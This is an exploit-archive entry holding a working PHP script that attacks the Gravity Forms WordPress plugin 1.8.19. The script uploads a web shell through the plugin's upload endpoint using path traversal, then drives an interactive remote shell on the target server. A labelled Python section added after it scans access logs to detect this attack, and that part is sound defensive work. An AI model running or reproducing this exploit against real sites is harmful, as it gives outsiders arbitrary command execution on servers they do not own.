WordPress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload
Source: an0nguy @ protonmail.ch  Author: Abk Khan  Published: 2016-06-20
<?php
/****************************************************************************************************************************
   *
    * Exploit Title        : Gravity Forms [WP] - Arbitrary File Upload
    * Vulnerable Version(s): 1.8.19 (and below)
    * Write-Up             : https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html
    * Coded by             : Abk Khan [ an0nguy @ protonmail.ch ]
  *
*****************************************************************************************************************************/
error_reporting(0);
 
echo "
   _____                 _ _         ______    _ _    
  / ____|               (_) |       |  ____|  | | |   
 | |  __ _ __ __ ___   ___| |_ _   _| |__ __ _| | |___
 | | |_ | '__/ _` \ \ / / | __| | | |  __/ _` | | / __|
 | |__| | | | (_| |\ V /| | |_| |_| | | | (_| | | \__ \
  \_____|_|  \__,_| \_/ |_|\__|\__, |_|  \__,_|_|_|___/
                                __/ |                 
                               |___/     > an Exploiter by AnonGuy\n";
$domain    = (@$argv[1] == '' ? 'http://localhost/wordpress' : @$argv[1]);
$url       = "$domain/?gf_page=upload";
$shell     = "$domain/wp-content/_input_3_khan.php5";
$separator = '-------------------------------------------------------------------';
 
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, '<?php system($_GET[0]); ?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
 
if (strpos($response, '"ok"') !== false) {
    echo "$separator\nShell at $shell\n$separator\nSpawning a 'No-Session' Shell . . . Done!\n$separator\n";
    while ($testCom != 'exit') {
        $user    = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
        $b0x     = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20hostname;%20echo%20'~'"), '~', '~'));
        echo "$user@$b0x:~$ ";
        $handle  = fopen("php://stdin", 'r');
        $testCom = trim(fgets($handle));
        fclose($handle);
        $comOut  = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
        echo $comOut;
    }
}
else {
    die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");
}
 
function get_string_between($string, $start, $end)
{
    # stolen from stackoverflow!
    $string = ' ' . $string;
    $ini    = strpos($string, $start);
    if ($ini == 0)
        return '';
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}
?>
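
Added detection example (not part of the original exploit or of the Gravity Forms project): a Python scan of web-server access logs for the two request shapes the script above produces, a POST to `?gf_page=upload` and a later request for an `_input_<field_id>_<name>` PHP file under `wp-content`. The log lines are constructed, the combined log format is assumed, and the function names and the file-name regex are this example's own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [20/Jun/2016:10:00:01 +0000] "POST /?gf_page=upload HTTP/1.1" 200 64 "-" "curl"
198.51.100.7 - - [20/Jun/2016:10:00:02 +0000] "GET /wp-content/_input_3_khan.php5?0=whoami HTTP/1.1" 200 12 "-" "-"
203.0.113.9 - - [20/Jun/2016:10:05:00 +0000] "GET /wp-content/uploads/2016/06/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [20/Jun/2016:10:06:00 +0000] "POST /contact/?ref=gf_page HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumption: dropped files keep the _input_<field_id>_<name> shape seen in the
# page's shell path; script extensions listed here are this example's choice.
DROPPED_RE = re.compile(
    r'/wp-content/(?:[^/]+/)*_input_\d+_[^/]*\.(?:php\d?|phtml|phar)$', re.I)

def classify(line):
    """Return (ip, time, finding, target, status) for a suspicious line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    path = unquote(parts.path)
    # Match on the parsed parameter, not a substring, to avoid lookalike URLs.
    if method == "POST" and "upload" in query.get("gf_page", []):
        return (ip, ts, "upload_endpoint_post", target, int(status))
    if DROPPED_RE.search(path):
        return (ip, ts, "script_request_in_wp_content", target, int(status))
    return None

def scan(log_text):
    findings = [f for f in map(classify, log_text.splitlines()) if f]
    uploaders = {f[0] for f in findings if f[2] == "upload_endpoint_post"}
    # A client that posted to the endpoint and then requested a dropped script
    # is the highest-priority lead for incident response.
    correlated = sorted({f[0] for f in findings
                         if f[2] == "script_request_in_wp_content" and f[0] in uploaders})
    return findings, correlated

if __name__ == "__main__":
    findings, correlated = scan(SAMPLE_LOG)
    for f in findings:
        print(*f, sep="\t")
    print("correlated clients:", correlated)
```

A hit on the second pattern with status 200 means the file exists and was served, so the matching path under `wp-content` should be preserved for forensics before cleanup.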